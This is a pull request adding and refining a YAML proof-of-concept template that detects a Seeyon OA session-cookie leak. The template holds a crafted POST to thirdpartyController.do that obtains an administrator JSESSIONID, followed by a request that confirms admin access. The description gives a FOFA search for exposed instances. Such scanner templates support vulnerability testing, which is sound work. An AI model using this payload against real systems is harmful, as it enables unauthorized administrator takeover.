### PR TITLE
seeyon-oa cookie leak

### DIFF
--- a/pocs/seeyon-oa-cookie-leak.yml
+++ b/pocs/seeyon-oa-cookie-leak.yml
@@ -4,17 +4,13 @@ rules:
     path: /seeyon/thirdpartyController.do
     body: |
       method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
-    search: JSESSIONID=(?P<session>.+?)
     expression: |
-      response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"a8genius.do")
-
+      response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"/seeyon/common/")
   - method: GET
-    path: /seeyon/main.do
-    headers:
-      Cookie: JSESSIONID={{session}}
+    path: /seeyon/main.do?method=headerjs
     expression: |
-      response.status == 200 && response.body.bcontains(b"当前已登录了一个用户，同一窗口中不能登录多个用户")
+      response.status == 200 && response.body.bcontains(b"\"name\":\"系统管理员\"") && response.body.bcontains(b"\"id\":\"-7273032013234748168\"")
 detail:
   author: Print1n(http://print1n.top)
   links:
-    - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20Session%E6%B3%84%E9%9C%B2%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
+    - https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg

--- a/pocs/seeyon-oa-cookie-leak.yml
+++ b/pocs/seeyon-oa-cookie-leak.yml
@@ -1,0 +1,20 @@
+name: poc-yaml-seeyon-oa-cookie-leak
+rules:
+  - method: POST
+    path: /seeyon/thirdpartyController.do
+    body: |
+      method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
+    search: JSESSIONID=(?P<session>.+?)
+    expression: |
+      response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"a8genius.do")
+
+  - method: GET
+    path: /seeyon/main.do
+    headers:
+      Cookie: JSESSIONID={{session}}
+    expression: |
+      response.status == 200 && response.body.bcontains(b"当前已登录了一个用户，同一窗口中不能登录多个用户")
+detail:
+  author: Print1n(http://print1n.top)
+  links:
+    - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20Session%E6%B3%84%E9%9C%B2%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
致远OA cookie泄露
## 测试环境
fofa app="致远互联-OA"
## 备注
与[#1166]()是同一个漏洞，完善匹配规则
![image](https://user-images.githubusercontent.com/73928418/126895480-337b0339-9c50-4209-a565-9054526920b1.png)

